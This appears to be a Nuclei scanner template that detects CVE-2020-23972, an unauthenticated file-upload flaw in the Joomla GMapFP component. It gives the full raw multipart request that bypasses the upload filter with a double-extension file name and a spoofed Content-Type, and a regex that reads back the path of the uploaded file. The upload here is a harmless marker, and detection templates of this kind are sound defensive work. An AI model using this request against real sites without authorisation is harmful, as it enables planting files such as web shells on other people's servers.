id: CVE-2020-23972

info:
  name: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    An attacker can access the upload function of the application
    without authenticating to the application and also can upload
    files due the issues of unrestricted file upload which can be
    bypassed by changing Content-Type & name file too double ext.
  reference: https://www.exploit-db.com/exploits/49129
  tags: cve,cve2020,joomla
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.50
    cve-id: CVE-2020-23972
    cwe-id: CWE-434

requests:
  - raw:
      - |
        POST /index.php?option=§component§&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: {{BaseURL}}
        Connection: close

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="option"

        com_gmapfp
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif"
        Content-Type: text/html

        projectdiscovery

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="no_html"

        no_html
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS--

    payloads:
      component:
        - "com_gmapfp"
        - "comgmapfp"

    extractors:
      - type: regex
        part: body
        regex:
          - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"